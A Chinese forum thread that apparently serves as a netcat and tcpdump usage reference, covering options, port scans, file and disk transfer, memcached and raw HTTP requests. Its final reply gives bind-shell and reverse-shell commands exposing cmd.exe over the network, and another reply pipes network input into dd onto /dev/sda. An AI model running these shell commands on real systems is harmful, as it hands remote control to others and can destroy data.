易陆发现互联网技术论坛

 找回密码
 开始注册
查看: 4560|回复: 13
收起左侧

tcpdump 、nc的使用记录

[复制链接]
发表于 2017-3-8 22:56:54 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?开始注册

x
nc -v 100.12.11.122  4952  
8 q( w' z; ]# ?( G5 y nc的使用见回帖
0 a4 W* p: `# ]( V  K" Y5 M9 S" p- U; H4 Q- L2 W$ ^" ~' W1 r
tcpdump -i any port 4952 -A -nnn -vvv |grep storage   
# @- m- G: a! {
, W8 Y( J' A# B6 E; O" I$ xtcpdump略+ W( o2 u2 w# l; ]+ i" ^

1 c- A! r0 j7 b! e2 y, j
* Z2 \% K6 ^4 Q( x: Z5 q. h# w

相关帖子

 楼主| 发表于 2017-3-9 18:50:59 | 显示全部楼层
nc 的参  数:, }/ S9 \/ E. N7 a- R( n! E
-g<网关>  设置路由器跃程通信网关,最丢哦可设置8个。
* _1 R; M3 n' k$ x -G<指向器数目>  设置来源路由指向器,其数值为4的倍数。
4 z  a$ n' T0 z5 X/ K0 s4 @; b( | -h  在线帮助。% N4 X7 K2 X. X% K, e
-i<延迟秒数>  设置时间间隔,以便传送信息及扫描通信端口。; Z8 g6 F, j. ]5 k" m
-l  使用监听模式,管控传入的资料。
* W+ o6 K. ?' E1 r -n  直接使用IP地址,而不通过域名服务器。9 Q6 _% b1 Z5 n5 t' \) y3 K  N6 I- i3 T
-o<输出文件>  指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
7 {6 H" v5 z: h  Q& ~ -p<通信端口>  设置本地主机使用的通信端口。% F: d2 m  d( I4 @: ~  F
-r  乱数指定本地与远端主机的通信端口。! i8 u. l' M9 P+ {% \
-s<来源位址>  设置本地主机送出数据包的IP地址。6 v3 p2 \9 {; X' s4 t; I  ^
-u  使用UDP传输协议。: u( a% t5 T, S- q$ S: ^
-v 详细输出--用两个-v可得到更详细的内容2 Y8 r, y- a. b
-w<超时秒数>  设置等待连线的时间。8 c# b& d2 P! a! c# S; Q
-z  使用0输入/输出模式,只在扫描通信端口时使用。
 楼主| 发表于 2017-3-9 18:51:42 | 显示全部楼层
测试:1 h+ Z6 i+ [3 r/ A: H, B
  端口扫描
0 D- t$ Y# C: L2 K, J# nc -v -w 2 192.168.2.34 -z 21-24
" v% F8 ?4 w4 K5 y6 G$ mnc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
' _+ m) c  j5 J" pConnection to 192.168.2.34 22 port [tcp/ssh] succeeded!
% \: i% P5 @5 M$ i' P7 \' x4 unc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused; {8 `7 d! i% W- Y
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
 楼主| 发表于 2017-3-9 18:52:16 | 显示全部楼层
从192.168.2.33拷贝文件到192.168.2.34
3 B- [, P+ B* |2 }& o在192.168.2.34上: nc -l 1234 > test.txt+ n' }1 a1 E/ |5 l( O% b
在192.168.2.33上: nc 192.168.2.34 < test.txt
 楼主| 发表于 2017-3-9 18:54:57 | 显示全部楼层
简单聊天工具
0 {/ q# D. k  l( Z2 q在192.168.2.34上: nc -l 1234
# J$ y6 p+ g' V9 _  s5 ]在192.168.2.33上: nc 192.168.2.34 1234/ v" h& p3 O3 P/ C8 ^$ r- U* Q
这样,双方就可以相互交流了。使用ctrl+C(或D)退出。! ]( U2 `0 L2 T# E/ j7 u1 p
 楼主| 发表于 2017-3-9 18:56:09 | 显示全部楼层
用nc命令操作memcached! e* _) m* \4 f3 _, W, J" p
1)存储数据:printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211
7 ~2 j/ r! m' B) j, h5 h2)获取数据:printf “get keyrn” |nc 192.168.2.34 11211
" j* h. S: ?1 z5 D+ P; `( w9 A3)删除数据:printf “delete keyrn” |nc 192.168.2.34 11211# B8 _3 [' y# @- G
4)查看状态:printf “statsrn” |nc 192.168.2.34 11211: b* Y( X; q4 ^) {# H* M# M
5)模拟top命令查看状态:watch “echo stats” |nc 192.168.2.34 11211- u5 a$ c3 H# h6 q! W& l' V2 N
6)清空缓存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)
 楼主| 发表于 2017-3-9 18:56:31 | 显示全部楼层
nc -p 1234 -w 5 host.example.com 80+ n: S" y! n! Q- ?; ^5 i- n& R! j
建立从本地1234端口到host.example.com的80端口连接,5秒超时
. W! E) U& t2 m/ }! h- J- Rnc -u host.example.com 53
( p- d+ O# P5 d. ?- g/ R6 _u为UDP连接
 楼主| 发表于 2017-3-9 18:57:24 | 显示全部楼层
echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 805 x$ }2 l7 J3 i: v
连接到主机并执行
 楼主| 发表于 2017-3-9 18:58:55 | 显示全部楼层
nc -v -z host.example.com 70-80: p0 g9 }, o) x% z3 w, z, X8 c1 b
扫描端口(70到80),可指定范围。-v输出详细信息。
 楼主| 发表于 2017-3-9 18:59:31 | 显示全部楼层
远程拷贝文件& R* I7 j+ m: m0 e$ Q7 M! L
从server1拷贝文件到server2上。需要先在server2上,用nc激活监听,
1 w- \1 j6 `: p4 j1 M
+ ]$ O2 u; D: L  Q' U- ~server2上运行:! W( I7 }# |* j0 @: ~3 c% b
8 l: i. R# `4 r4 O
root@hatest2 tmp]# nc -lp 123 > install.log
4 O- h) B' I) B
; t# P8 B/ q; t, jserver1上运行:8 j( K& C5 y9 E
. @" K# T8 Z* g7 e7 G7 }
[root@hatest1 ~]# ll install.log* M/ v8 ]$ ~# z% b0 X6 F
-rw-r–r–  1 root root 39693 12月 20  2007 install.log5 P7 e3 H& x: d  ]
[root@hatest1 ~]# nc -w 1 192.168.228.222 123 < install.log
 楼主| 发表于 2017-3-9 19:00:07 | 显示全部楼层
克隆硬盘或分区
) B. [2 \# D4 d$ U3 H+ a" f操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。. O# h  D9 [0 u" \0 @
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:. r/ T* G4 i4 D# U% U: K- |& j$ x# z
# nc -l -p 1234 | dd of=/dev/sda; B- y+ M2 `* c( F

7 v: h/ _+ T6 b9 H: Xserver1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:
$ }$ y  H& K# U! ]# dd if=/dev/sda | nc 192.168.228.222 1234
* X4 x9 O% ]- {5 M' L  {
2 u! s% ^* d3 y6 P6 S: v8 U$ w# ^6 W※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。
 楼主| 发表于 2017-3-9 19:01:51 | 显示全部楼层
克隆硬盘或分区1 R4 a2 r' I9 {
操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。2 O0 ^  b# k9 N: h& ^8 W
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工 具光盘)启动系统后,在server2上进行类似的监听动作:: h4 B" a( r/ A: g) `% n2 L
# nc -l -p 1234 | dd of=/dev/sda
. N% N$ o9 J4 ?, U  I4 U ; L4 ?3 U, X/ Y" h+ \  {8 r9 z* O& |
server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:/ z8 ~0 p$ O6 v- I0 h
# dd if=/dev/sda | nc 192.168.228.222 1234% A; q; N; `9 N7 K" t
" ^  T( z" Q; V* [- X
※ 完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP。
发表于 2017-3-9 19:09:26 | 显示全部楼层
保存Web页面4 a+ `- I7 b" d9 ^' _
# while true; do nc -l -p 80 -q 1 < somepage.html; done
发表于 2017-3-9 19:12:51 | 显示全部楼层
模拟HTTP Headers,获取网页源代码和返回头部信息6 g# z+ s$ `6 h' W

  t! H- ], ]; s" r[root@hatest1 ~]# nc www.linuxso.com 80
0 x' ~7 A2 M* l+ {; t9 IGET / HTTP/1.1, q' v- U! o. a0 [- J) G- l
Host: ispconfig.org9 N# ~& T5 J, F# }4 u+ T) X5 @& p( B
Referrer: mypage.com/ \, w, y6 K4 g* v! ?' X) M8 f
User-Agent: my-browser
- I+ \$ ~" x1 c+ s# s, @+ s
8 C1 `- F! Z+ @4 g' NHTTP/1.1 200 OK2 t+ g' I, K$ M5 X$ f! k) n: V8 o
Date: Tue, 16 Dec 2008 07:23:24 GMT" M; O7 N" B$ U0 j- v6 t. A7 i1 z
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8( Q* c) ~( G2 {" x
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
5 m5 {  |" ^% ?Expires: 0
, {! s# ]7 X- n/ N& M* ICache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
& p+ x- l7 [- LPragma: no-cache
, v2 q! ~1 [. ^2 v3 W  v' e1 i- iCache-Control: private, post-check=0, pre-check=0, max-age=07 N3 Y9 o4 |3 @( s* d7 B# f
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
+ g3 }5 X" P: t' ~Vary: Accept-Encoding% e; E+ S8 O- e3 o2 I
Transfer-Encoding: chunked, }9 G+ C$ n" }/ Q& w; ^: [
Content-Type: text/html
; Q$ I+ ^! v6 f+ ^[......]
1 A) I2 f6 o  Z% g& i; d* N在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。# l* U. k/ j' q* h& o- P8 v; m
, j3 D3 B2 N+ G( j1 x

( x- R. v0 h0 t3 t# Y2 L" X
9 Y3 f" e# @+ t8 e9 _, |传输目录
0 ?, @8 T* m' ~; L% G- T从server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:
1 V! d0 y8 B9 ?  {6 K引用
1 V  y$ ]: }$ r- J 9 B  Y. K6 f1 I5 b$ B) S: D+ k
[root@hatest2 tmp]# nc -l 1234 |tar xzvf -* J+ L9 d$ o# F* O& o
server1上运行:" K( @7 c0 b1 n: _
引用2 c9 r/ r& w1 [! a; B
* J' k) c1 Y. g$ n8 r% ^
[root@hatest1 ~]# ll -d nginx-0.6.34
4 D; t  L$ n4 F6 Edrwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
% j: C8 |2 e* o7 A/ ][root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
5 A4 ?* j* B! T. ^# V% O
0 ~1 Q5 m7 i) \0 v1 f3 Q' R$ s
2 W7 z6 a; t! u/ K* E# M3 d8 Y
1 ^; I5 J9 Q6 Z0 _: wREMOTE主机绑定SHELL% {; n) Z- X+ m. R
例子:; D- C9 [4 w# R3 I5 e
& L3 L2 s: H9 d; N$ r* i4 D
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe& B4 ^- w, v" C* A. z. w
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
9 w* t, [6 J: a5 p+ q " K5 K; T4 ?) m! f! X( `6 V6 J
. {* n& G7 E! S
REMOTE主机绑定SHELL并反向连接
9 m: @3 T2 o6 v) h例子:6 R, E7 E( W9 W% R
) ~2 v- F% q( E0 t' j
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
6 C4 k9 _. n+ _- a) L6 x讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
0 u) N( R* O0 ?( r: U7 o  f以上为最基本的几种用法(其实NC的用法还有很多,
; G7 P# E( O4 i# p, ?当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)! s% ], I. H) q' Z6 ]5 z" O
您需要登录后才可以回帖 登录 | 开始注册

本版积分规则

关闭

站长推荐上一条 /4 下一条

北京云银创陇科技有限公司以云计算运维,代码开发

QQ|返回首页|Archiver|小黑屋|易陆发现技术论坛 ( 蜀ICP备2026014127号-1 )点击这里给我发消息

GMT+8, 2026-4-9 00:59 , Processed in 0.060022 second(s), 26 queries .

Powered by Discuz! X3.4 Licensed

© 2012-2025 Discuz! Team.

快速回复 返回顶部 返回列表